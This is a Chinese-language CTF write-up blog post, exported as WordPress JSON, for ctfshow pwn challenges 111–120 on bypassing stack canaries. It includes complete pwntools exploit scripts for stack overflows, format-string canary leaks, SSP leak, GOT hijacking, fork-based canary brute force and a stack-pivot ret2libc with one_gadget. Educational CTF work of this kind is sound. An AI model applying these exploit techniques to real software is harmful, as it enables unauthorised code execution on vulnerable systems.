{"id":996,"date":"2026-02-19T13:20:43","date_gmt":"2026-02-19T05:20:43","guid":{"rendered":"http:\/\/lycoreco.cn\/?p=996"},"modified":"2026-02-19T13:20:45","modified_gmt":"2026-02-19T05:20:45","slug":"ctfshowbypass%e5%ae%89%e5%85%a8%e6%9c%ba%e5%88%b6pwn111pwn%e6%9b%b4%e6%96%b0%e4%b8%ad","status":"publish","type":"post","link":"http:\/\/lycoreco.cn\/index.php\/2026\/02\/19\/ctfshowbypass%e5%ae%89%e5%85%a8%e6%9c%ba%e5%88%b6pwn111pwn%e6%9b%b4%e6%96%b0%e4%b8%ad\/","title":{"rendered":"ctfshow:bypass\u5b89\u5168\u673a\u5236pwn111~pwn(\u66f4\u65b0\u4e2d)"},"content":{"rendered":"\n

pwn111<\/h1>\n\n\n\n

\u6ca1\u96be\u5ea6<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n


\u786e\u5b9e\u662f\u4e00\u4e2a\u7b80\u5355\u7684\u6808\u6ea2\u51fa\uff0c\u9700\u8981ret2libc\uff0c\u5509\u7b49\u7b49\uff0c\u6709\u540e\u95e8<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
from pwn import *\ncontext(arch='amd64',os='linux',log_level='debug')\n#p = process('.\/pwn109')\np = remote('pwn.challenge.ctf.show',28206)\nelf = ELF('.\/pwn111')\noffset=0x80+8\nback=0x400697\npayload=b'a'*offset+p64(back)\np.sendline(payload)\np.interactive()\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
pwn112<\/h1>\n\n\n\n
\u6ee1\u8db3\u4e00\u5b9a\u6761\u4ef6\u5373\u53ef<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u4e00\u770b\u77e5\u9053n17=17\u7684\u65f6\u5019\u6709\u597d\u4e1c\u897f\uff0c\u8ddf\u8fdb<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u679c\u7136\u53ef\u4ee5\u62ff\u5230flag\uff0c\u90a3\u4e48\u600e\u4e48\u8ba9n17=17\u5462<\/p>\n\n\n\n
n17\u7684\u4f4d\u7f6e\u5728bass\u6bb5<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u539f\u6765var\u7684\u4f4d\u7f6e\u4e5f\u5728bass\u6bb5\uff0cn17\u662fvar[13]<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u6240\u4ee5\u6211\u4eec\u628avar[13]\u8986\u76d6\u621017\u5c31\u884c\u4e86\uff0c0x11<\/p>\n\n\n\n
from pwn import *\ncontext(arch='i386',os='linux',log_level='debug')\n#p = process('.\/pwn109')\np = remote('pwn.challenge.ctf.show',28132)\nelf = ELF('.\/pwn112')\npayload=p32(0x11)*0xe\np.sendline(payload)\np.interactive()\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
pwn113<\/h1>\n\n\n\n
\u7406\u6e05\u903b\u8f91\uff0c\u9898\u76ee\u4e0d\u96be\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u5443\uff0c\u5148\u653e\u653e\u5427<\/p>\n\n\n\n
pwn114<\/h1>\n\n\n\n
\u73b0\u5728\u4f60\u5e94\u8be5\u5b66\u4f1a\u4e86\u5427<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  char s1[10]; \/\/ [rsp+16h] [rbp-3FAh] BYREF\n  char s[1004]; \/\/ [rsp+20h] [rbp-3F0h] BYREF\n  int char; \/\/ [rsp+40Ch] [rbp-4h]\n\n  init(argc, argv, envp);\n  logo();\n  signal(11, sigsegv_handler);\n  flagishere();\n  while ( 1 )\n  {\n    puts(\"Do you know Canary now?\");\n    puts(\"Input 'Yes' or 'No': \");\n    __isoc99_scanf(\"%s\", s1);\n    if ( !strcmp(s1, \"Yes\") )\n      break;\n    if ( !strcmp(s1, \"No\") )\n    {\n      puts(\"I'm sorry to hear that! Come on.\");\n      return 0;\n    }\n    puts(\"Invalid input, please enter again!\");\n  }\n  puts(\"Ok,I know you got it!\");\n  puts(\"Tell me you want: \");\n  do\n    char = getchar();\n  while ( char != 10 && char != -1 );\n  fgets(s, 1000, stdin);\n  ctfshow(s);\n  return 0;\n}<\/code><\/pre>\n\n\n\n
main\u51fd\u6570\u4e2d\uff0c\u4e00\u5f00\u59cb\u8bfb\u53d6\u4e86flag\uff0c\u4f46\u662f\u6ca1\u6709\u8f93\u51fa\uff0c\u5224\u65ad\u6211\u4eec\u9700\u8981\u9009Yes\uff0c\u7136\u540e\u8fdb\u884c\u8f93\u5165<\/p>\n\n\n\n
\u8ddf\u8fdbctfshow<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u62f7\u8d1d\u4e86s\u5230dest,\u53ef\u4ee5\u6ea2\u51fa\u5c31\u6709flag<\/p>\n\n\n\n
\u76f4\u63a5\u751f\u62100x100\u4e2a\u5b57\u7b26\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
pwn115<\/h1>\n\n\n\n
Bypass Canary \u59ff\u52bf1<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u6211\u4eec\u53d1\u73b0\u6709\u540e\u95e8\u53ef\u4ee5ret2\uff0c\u8ddf\u8fdbctfshow\u51fd\u6570<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u7a0b\u5e8f\u6709\u4e24\u6b21\u8f93\u5165<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6211\u4eec\u9700\u8981\u5148\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6cc4\u9732canary\u7136\u540e\u8fdb\u884cret2text<\/p>\n\n\n\n
\u6211\u4eec\u76f4\u63a5\u5957\u516c\u5f0f((0xd4-0xc)\/4)+5=55<\/p>\n\n\n\n
\u504f\u79fb\u662f55<\/p>\n\n\n\n
from pwn import *\ncontext(arch='i386',os='linux',log_level='debug')\n# p = process('.\/pwn115')\np = remote('pwn.challenge.ctf.show',28144)\nelf = ELF('.\/pwn115')\npayload=b'aaaa'+b'%55$p'\np.send(payload)\np.recvuntil(b'aaaa0x')\ncanary=int(p.recv(8),16)\nprint(f'canary={hex(canary)}')\n\npayload1=b'a'*(0xd4-0xc)+p32(canary)+b'a'*0xc+p32(0x80485A6)\np.sendline(payload1)\np.interactive()\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
pwn116<\/h1>\n\n\n\n
Bypass Canary \u59ff\u52bf2<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u6709\u540e\u95e8\uff0c\u8ddf\u8fdbctfshow\u51fd\u6570<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u6211\u4eec\u540c\u6837\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6cc4\u9732canary\uff0c\u5148\u8ba1\u7b97\u548c\u9a8c\u8bc1canary\u7684\u504f\u79fb<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

((0x2c-0xc)\/4=8 \u52a0\u4e0a\u683c\u4e32\u504f\u79fb7\u7b49\u4e8e15<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
from pwn import *\ncontext(arch='i386',os='linux',log_level='debug')\n#p = process('.\/pwn116')\np = remote('pwn.challenge.ctf.show',28291)\nelf = ELF('.\/pwn116')\npayload=b\"aaaa%15$p\"\n#gdb.attach(p,'b 0x8048640')\np.sendline(payload)\np.recvuntil(\"aaaa0x\")\ncanary=int(p.recv(8),16)\nprint(f'canary={hex(canary)}')\npayload2=b'a'*(0x2c-0xc)+p32(canary)+b'a'*0xc+p32(0x8048586)\np.sendline(payload2)\np.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

pwn117\uff08SSP Leak\uff09<\/h1>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  int fd; \/\/ [rsp+2Ch] [rbp-114h]\n  _BYTE v5[264]; \/\/ [rsp+30h] [rbp-110h] BYREF\n  unsigned __int64 v6; \/\/ [rsp+138h] [rbp-8h]\n\n  v6 = __readfsqword(0x28u);\n  logo();\n  init();\n  fd = open(\"\/flag\", 0);\n  if ( !fd )\n  {\n    puts(\"No such file or directory.\");\n    exit(-1);\n  }\n  read(fd, &buf, 0x100u);\n  puts(\"Haha,It has reduced you a lot of difficulty!\");\n  gets(v5);\n  return 0;\n}<\/code><\/pre>\n\n\n\n
\u8fd9\u9053\u9898\u9700\u8981\u7528\u5230Stack Smashing Protect Leak\uff0c\u53ef\u4ee5\u83b7\u53d6\u5185\u5b58\u4e2d\u7684\u503c<\/p>\n\n\n\n
\u6ce8\u610f\u770b\u7ed3\u5c3e\u5904\u5982\u679ccanary\u7684\u503c\u88ab\u6539\u53d8\u5c31\u4f1a\u5728\u7ed3\u675f\u524d\u6267\u884c__stack_chk_fail<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u6211\u4eec\u53ef\u4ee5\u4e86\u89e3\u4e00\u4e0b\u8fd9\u4e2a\u51fd\u6570<\/p>\n\n\n\n
eglibc-2.19\/debug\/stack_chk_fail.c\n\nvoid __attribute__ ((noreturn)) __stack_chk_fail (void)\n{\n  __fortify_fail (\"stack smashing detected\");\n}\n\nvoid __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)\n{\n  \/* The loop is added only to keep gcc happy.  *\/\n  while (1)\n    __libc_message (2, \"*** %s ***: %s terminatedn\",\n                    msg, __libc_argv[0] ?: \"<unknown>\");\n}\n<\/code><\/pre>\n\n\n\n

\u8fd9\u9053\u9898\u540e\u9762get()\u5b58\u5728\u6808\u6ea2\u51fa\uff0c\u5f53\u6808\u6ea2\u51fa\u53ef\u4ee5\u8986\u76d6\u7a0b\u5e8f\u4e2d\u7684argv[0]\u65f6\uff0c\u6211\u4eec\u53ef\u4ee5\u7528\u8fd9\u4e2a\u65b9\u6cd5\u6253\u5370\u4efb\u610f\u5730\u5740\u7684\u503c\uff0c\u6bd4\u5982\u8fd9\u91cc\u7684bass\u6bb5<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u4f46\u662f\u6211\u7684\u504f\u79fb\u7b97\u51fa\u6765\u662f528\uff0c\u6b63\u786e\u504f\u79fb\u662f504<\/p>\n\n\n\n
from pwn import *\ncontext(arch='amd64',os='linux',log_level='debug')\n#p = process('.\/pwn117')\np = remote('pwn.challenge.ctf.show',28232)\nelf = ELF('.\/pwn117')\npayload=b\"a\"*504+p64(0x6020A0)\n#gdb.attach(p,'b main')\np.sendline(payload)\np.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u53ef\u80fd\u662f\u6211\u7684libc\u7248\u672c\u9ad8\u4e86\u4e00\u70b9<\/p>\n\n\n\n
pwn118<\/h1>\n\n\n\n
Bypass Canary \u59ff\u52bf4<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6709\u540e\u95e8<\/p>\n\n\n\n
\u8ddf\u8fdbctfshow\u51fd\u6570<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6709\u6808\u6ea2\u51fa\u548c\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\uff0c\u4f46\u662f\u6709\u4e00\u4e2a\u95ee\u9898\uff0c\u6211\u4eec\u53ea\u80fd\u7528\u4e00\u6b21\uff0c\u6211\u4eec\u9700\u8981\u60f3\u529e\u6cd5\u8ba9\u7a0b\u5e8f\u5728\u8fd0\u884c\u5c31\u53ef\u4ee5,\u4f46\u662f\u770b\u4e86wp\u6709\u66f4\u597d\u7684\u529e\u6cd5\uff0c\u52ab\u6301__stack_chk_fail\u51fd\u6570\uff0c\u56e0\u4e3a\u5982\u679ccanary\u88ab\u7be1\u6539\u5c31\u4f1a\u8c03\u7528\u8fd9\u4e2a\u51fd\u6570\uff0c\u6211\u4eec\u628a\u5b83\u6539\u6210get_flag\u5c31\u53ef\u4ee5\u62ff\u5230flag<\/p>\n\n\n\n
\u770b\u770b\u504f\u79fb\u662f7<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u586b\u5145\u52300x5c-c=0x50<\/p>\n\n\n\n
from pwn import *\ncontext(arch='i386',os='linux',log_level='debug')\n#p = process('.\/pwn117')\np = remote('pwn.challenge.ctf.show',28284)\nelf = ELF('.\/pwn118')\nstackcheck=elf.got['__stack_chk_fail']\nget_flag=elf.sym['get_flag']\npayload=fmtstr_payload(7,{stackcheck:get_flag})\npayload=payload.ljust(0x50,b'a')\np.sendline(payload)\np.recv()\np.interactive()<\/code><\/pre>\n\n\n\n
pwn119<\/h1>\n\n\n\n
Bypass Canary \u59ff\u52bf5<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
while ( 1 )\n  {\n    puts(\"Try PWN Me!\");\n    if ( !fork() )\n      break;\n    wait(0);\n  }\n  ctfshow();\n  exit(0);\n}<\/code><\/pre>\n\n\n\n
\u8fd9\u4e2a\u5faa\u73af\u91cc\u9762\u6709\u4e00\u4e2afork\u51fd\u6570<\/p>\n\n\n\n
\u8ddf\u8fdbctfshow\u51fd\u6570<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6709\u6808\u6ea2\u51fa\u548ccanary<\/p>\n\n\n\n
.fork\u51fd\u6570\u7a76\u7adf\u5728\u5e72\u4ec0\u4e48\uff1f\u2014\u2014\u2014\u2014>\u7236\u5b50\u8fdb\u7a0b\u5171\u4eab\u4ee3\u7801\u6bb5\uff0c\u5404\u81ea\u62e5\u6709\u6570\u636e\u6bb5\uff08\u5199\u65f6\u62f7\u8d1d\uff09<\/p>\n\n\n\n
\u6240\u4ee5\u5728\u540c\u4e00\u4e2a\u8fdb\u7a0b\u4e2dcanary\u662f\u76f8\u540c\u7684\uff0c\u6211\u4eec\u53ef\u4ee5\u7206\u7834<\/p>\n\n\n\n
from pwn import *\ncontext.log_level = 'debug'\n#io = process('.\/pwn119')\nio = remote('pwn.challenge.ctf.show',28121)\nelf = ELF('.\/pwn119')\nbackdoor = 0x08048636\n \ncanary = b'\\x00'\nfor i in range(3):\n  for j in range(0, 256):\n      payload = b'a' * (0x70 - 0xC) + canary + p8(j)\n      io.send(payload)\n      sleep(0.3)\n      text = io.recv()\n      print(text)\n      if (b\"stack smashing detected\" not in text):\n          canary += p8(j)\n          print(b\"Canary: \" + canary)\n          break\nprint('Canary:'+ hex(u32(canary)))\npayload = b'a' * (0x70 - 0xC) + canary + b'a' * 0xc + p32(backdoor)\nio.send(payload)\nio.recv()\nio.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
pwn120<\/h1>\n\n\n\n
Bypass Canary \u59ff\u52bf6<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u8fd9\u9053\u9898\u5e94\u8be5\u662f\u8981\u6cc4\u9732libc\u7684\uff0cmain\u4e2d\u7684pthread_create\u662f\u521b\u5efa\u7ebf\u7a0b\uff0cpthread_join\u662f\u7ebf\u7a0b\u7ed3\u675f\u7ebf\u7a0b\u95f4\u540c\u6b65\uff0c\u8ddf\u8fdb\u4e00\u4e0bstart\u51fd\u6570<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4e3b\u8981\u5229\u7528n0x5000 <= 20480\u7684\u60c5\u51b5\uff0c\u8ddf\u8fdbreadn<\/p>\n\n\n\n
\u4e3b\u8981\u4e5f\u662f\u4f53\u73b0\u6ea2\u51fa\uff0c\u6211\u4eec\u4f1a\u8986\u76d6canary\u5f53\u6ea2\u51fa\u8db3\u591f\u5927\u65f6\uff0c\u6211\u4eec\u4f1a\u628a\u6808\u4e0a\u7684\u548cTLS\uff08\u521b\u5efa\u7ebf\u7a0b\u7684\u65f6\u5019\u521b\u5efa\uff09\u4e2d\u7684canary\u4e00\u8d77\u8986\u76d6\u6389<\/p>\n\n\n\n
\u8986\u76d6\u5927\u5c0f\u662f0x510\uff0c\u6211\u4eec\u9700\u8981\u627e\u4f9d\u4e00\u4e9bgadget<\/p>\n\n\n\n
\u6211\u4eec\u9700\u8981\u628a\u6808\u8fc1\u79fb\u5230bass\u6bb5\uff0c\u56e0\u4e3a\u6808\u4e0d\u53ef\u6267\u884c\uff0c\u6240\u4ee5\u9700\u8981leave\u7684\u5730\u5740\uff0cbass\u6bb5\u7684\u5730\u5740<\/p>\n\n\n\n
\u6808\u5e03\u5c40\uff1a<\/p>\n\n\n\n
[ buffer ... ]\n[ saved rbp ]  <-- \u6539\u6210 bss_addr - 8\n[ return addr ]<\/code><\/pre>\n\n\n\n
leave\u64cd\u4f5c\u4e4b\u540e\u5c31\u5b9e\u73b0\u4e86\u6808\u8fc1\u79fb<\/p>\n\n\n\n
\u7136\u540e\u6b63\u5e38\u6cc4\u9732puts<\/p>\n\n\n\n
\u6211\u4eec\u9700\u8981\u5199\u4e00\u4e2aone_gadget\u5230stack_pivot\u4e0a\uff0c\u6240\u4ee5\u9700\u8981\u4e00\u4e2aread\u4e3a\u540e\u9762\u53d1\u9001onegadget\u505a\u51c6\u5907read(ssize_t read(int fd, void *buf, size_t count)\u53ea\u9700\u8981\u8bbe\u7f6e\u524d\u4e24\u4e2a\uff0c0,bass_addr\u7136\u540e\u6267\u884cleave<\/p>\n\n\n\n
gadget:<\/p>\n\n\n\n
0x0000000000400be3 : pop rdi ; ret\n0x0000000000400be1 : pop rsi ; pop r15 ; ret\n0x00000000004006be : ret\n0000000000400B71 018 C9                            leave\ndata:0000000000602000<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u6cc4\u9732\u51fa\u6765\u5e94\u8be5\u662f2.27\u7684\uff0c\u627e\u5230\u4e00\u4e9bone_gadget<\/p>\n\n\n\n
0x4f29e execve(\"\/bin\/sh\", rsp+0x40, environ)\nconstraints:\n  address rsp+0x50 is writable\n  rsp & 0xf == 0\n  rcx == NULL || {rcx, \"-c\", r12, NULL} is a valid argv\n\n0x4f2a5 execve(\"\/bin\/sh\", rsp+0x40, environ)\nconstraints:\n  address rsp+0x50 is writable\n  rsp & 0xf == 0\n  rcx == NULL || {rcx, rax, r12, NULL} is a valid argv\n\n0x4f302 execve(\"\/bin\/sh\", rsp+0x40, environ)\nconstraints:\n  [rsp+0x40] == NULL || {[rsp+0x40], [rsp+0x48], [rsp+0x50], [rsp+0x58], ...} is a valid argv\n\n0x10a2fc execve(\"\/bin\/sh\", rsp+0x70, environ)\nconstraints:\n  [rsp+0x70] == NULL || {[rsp+0x70], [rsp+0x78], [rsp+0x80], [rsp+0x88], ...} is a vali<\/code><\/pre>\n\n\n\n
from pwn import *\ncontext(arch='amd64',os='linux',log_level='debug')\n#p = process('.\/pwn120')\np = remote('pwn.challenge.ctf.show',28109)\nelf = ELF('.\/pwn120')\nlibc=ELF(\"\/home\/faetong\/glibc-all-in-one\/libs\/2.27-3ubuntu1.6_amd64\/libc-2.27.so\")\nputs_plt=elf.plt['puts']\nputs_got=elf.got['puts']\ndata_addr=0x602000\npop_rdi_ret=0x400be3\npop_rsi_r15_ret=0x400be1\nleave_addr=0x400B71\none_gadget=0x4f302 \nread_addr=elf.sym['read']\npayload1=b'a'*0x510+p64(data_addr-8)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(pop_rdi_ret)+p64(0)+p64(pop_rsi_r15_ret)+p64(data_addr)+p64(0)+p64(read_addr)+p64(leave_addr)\npayload1=payload1.ljust(0x1000,b'a')\np.sendlineafter(\"time?\\n\",str(0x1000))\np.send(payload1)\nsleep(0.5)\n#print(p.recv())\np.recvuntil(b\"See you next time!\\n\")\nputs_addr = u64(p.recv(6).ljust(8, b\"\\x00\"))\nprint(hex(puts_addr))\nbase_addr=puts_addr-libc.sym['puts']\none_gadget_real=one_gadget+base_addr\npayload2=p64(one_gadget_real)\np.send(payload2)\np.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
pwn111 \u6ca1\u96be\u5ea6 \u786e\u5b9e\u662f\u4e00\u4e2a\u7b80\u5355\u7684\u6808\u6ea2\u51fa\uff0c\u9700\u8981ret2libc\uff0c\u5509\u7b49\u7b49\uff0c\u6709\u540e\u95e8 pwn112 \u6ee1\u8db3\u4e00\u5b9a\u6761\u4ef6 […]<\/p>\n","protected":false},"author":1,"featured_media":1043,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[9,4],"class_list":["post-996","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-learn","tag-bypass","tag-pwn"],"_links":{"self":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/996","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/comments?post=996"}],"version-history":[{"count":1,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/996\/revisions"}],"predecessor-version":[{"id":1042,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/996\/revisions\/1042"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/media\/1043"}],"wp:attachment":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/media?parent=996"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/categories?post=996"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/tags?post=996"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}